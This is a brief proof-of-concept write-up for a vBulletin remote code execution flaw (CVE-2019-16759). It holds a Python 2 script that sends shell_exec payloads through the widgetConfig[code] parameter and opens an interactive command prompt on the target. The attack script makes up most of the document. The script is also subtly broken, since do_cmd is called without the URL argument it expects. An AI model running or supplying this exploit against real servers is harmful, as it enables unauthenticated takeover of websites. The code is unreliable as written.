VBulletin RCE (CVE-2019-16759)

There is a vulnerability in VBulletin from version 5.0.0 to 5.5.4, allowing unauthenticated user to execute commands on the system (RCE) via widgetConfig[code] parameter in an ajax/render/widget_php routestring request.

POC

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <vBulletin URL>" % sys.argv[0])


def do_cmd(url, cmd):
    params = {
        'routestring': 'ajax/render/widget_php',
        'widgetConfig[code]': 'echo shell_exec(\'' + cmd + '\'); exit;'
    }
    r = requests.post(url=url, data=params)

    if r.status_code == 200:
        return r.text
    else:
        raise Exception('Cannot exploit target')


while True:
    try:
        cmd = raw_input("> ")
        output = do_cmd(cmd)
        print(output)
    except KeyboardInterrupt:
        sys.exit("Closing shell...")
    except Exception, e:
        sys.exit(str(e))